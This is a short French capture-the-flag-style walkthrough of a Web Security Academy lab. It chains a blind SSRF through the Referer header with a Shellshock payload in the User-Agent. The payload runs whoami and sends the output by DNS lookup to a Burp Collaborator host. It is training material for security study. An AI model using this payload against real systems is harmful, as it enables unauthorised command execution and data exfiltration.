SSRF aveugle exploité via Shellshock

Blind SSRF with Shellshock exploitation

Lab: Blind SSRF with Shellshock exploitation | Web Security AcademyWebSecAcademy

Ce site utilise un module d’analyse qui récupère l’URL fournie dans l’entête Referer chaque fois qu’une page produit est consultée. Pour résoudre le lab, il faut détourner cette fonctionnalité afin d’effectuer une SSRF aveugle vers un serveur interne situé dans la plage 192.168.0.X sur le port 8080. Lors de l’attaque aveugle, on doit injecter un payload Shellshock pour exfiltrer le nom de l’utilisateur du système.

Observation initiale

Lorsqu’on visite une page produit, le site envoie bien une requête basée sur l’en-tête Referer :

Referer: https://uki6j3wedmsljxlwoclacsdxtozhn7bw.oastify.com/

Cela confirme que l’application contacte automatiquement l’URL fournie dans ce header.

Exploitation via SSRF aveugle

L’objectif est de forcer l’application à contacter un hôte interne :

Referer: http://192.168.X:8080

Comme le service interne est vulnérable à Shellshock, on injecte un payload dans l’en-tête User-Agent, qui sera interprété par le serveur ciblé.

Le payload exécute une commande permettant d’exfiltrer le résultat de whoami via une requête DNS envoyée à Burp Collaborator :

User-Agent: () { :; }; /usr/bin/nslookup $(whoami).isep8p4f4itsik7zvx76ataoyf47sygn.oastify.com

Résultat

Une requête DNS apparaît côté Collaborator, contenant le nom de l’utilisateur système. Dans ce cas, l’utilisateur renvoyé est :

Mis à jour il y a 3 mois

hashtagBlind SSRF with Shellshock exploitation

hashtagObservation initiale

hashtagExploitation via SSRF aveugle

hashtagRésultat

Blind SSRF with Shellshock exploitation

Observation initiale

Exploitation via SSRF aveugle

Résultat